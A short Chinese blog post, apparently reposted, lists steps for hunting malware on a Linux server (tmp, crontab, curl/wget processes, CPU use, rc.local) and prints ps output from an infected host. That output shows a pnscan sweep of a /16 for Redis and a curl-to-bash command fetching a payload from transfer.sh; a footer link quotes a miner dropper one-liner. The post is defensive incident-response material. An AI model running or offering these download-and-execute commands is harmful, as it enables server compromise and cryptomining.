linux查杀病毒的几个思路

Posted gaoyuechen

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了linux查杀病毒的几个思路相关的知识,希望对你有一定的参考价值。

1.  tmp 目录下面

2. 定时任务查找一下 crontab -e

3. 病毒要下载 ps -ef|egrep "curl|wget"  查看是否有下载的命令

4. top 一下看一下哪个占用cpu最高

5. 查找目标文件 find  /  -perm 777 目录下777   权限的文件

6. /etc/passwd下面的文件用户哪些可以登录,去掉不正常的可以登录用户/bin/bash

7.查看 /etc/rc.local 用户下面的开机自启动

8. 

 

[[email protected] tmp]# ps -ef |grep pnscan
root 29073 5659 10 14:07 ? 00:00:02 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 31.105.0.0/16 6379
root 30141 4684 0 14:07 pts/1 00:00:00 grep pnscan

[[email protected] tmp]# ps -ef|egrep curl
root 5655 5653 0 Apr27 ? 00:00:00 /bin/sh -c curl -s https://transfer.sh/3EqNx/tmp.GewSw5ccS1 > .cmd && bash .cmd
root 7838 4684 0 13:56 pts/1 00:00:00 egrep curl

以上是关于linux查杀病毒的几个思路的主要内容,如果未能解决你的问题,请参考以下文章

你会查杀病毒吗?反病毒技巧! 比较长。

linux系统服务器中的蠕虫病毒怎么清除

如何杀除局域网病毒

Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh

应急响应 Windows和Linux操作系统(查杀 后门木马,处理 勒索病毒.)

病毒木马查杀实战第019篇:病毒特征码查杀之编程实现